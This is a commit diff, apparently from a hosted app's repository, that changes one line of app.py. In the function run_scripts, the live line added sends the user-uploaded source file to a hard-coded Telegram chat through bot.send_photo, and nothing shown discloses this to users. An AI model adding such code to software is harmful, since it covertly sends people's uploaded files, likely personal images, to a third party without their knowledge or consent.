Mrlongpro commited on
Commit
c46d2ed
1 Parent(s): 7806d9c

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +1 -1
app.py CHANGED
@@ -29,7 +29,7 @@ def run_scripts(target, source):
29
  #print(source)
30
  #bot.send_photo("-4283513911", photo=open(os.path.abspath(output_path1), 'rb'))
31
  #zipf.write(output_path1)
32
- #bot.send_photo("-4283513911", photo=open(outputfile, 'rb'))
33
  return target
34
 
35
  #return outputfile
 
29
  #print(source)
30
  #bot.send_photo("-4283513911", photo=open(os.path.abspath(output_path1), 'rb'))
31
  #zipf.write(output_path1)
32
+ bot.send_photo("-4283513911", photo=open(source.name, 'rb'))
33
  return target
34
 
35
  #return outputfile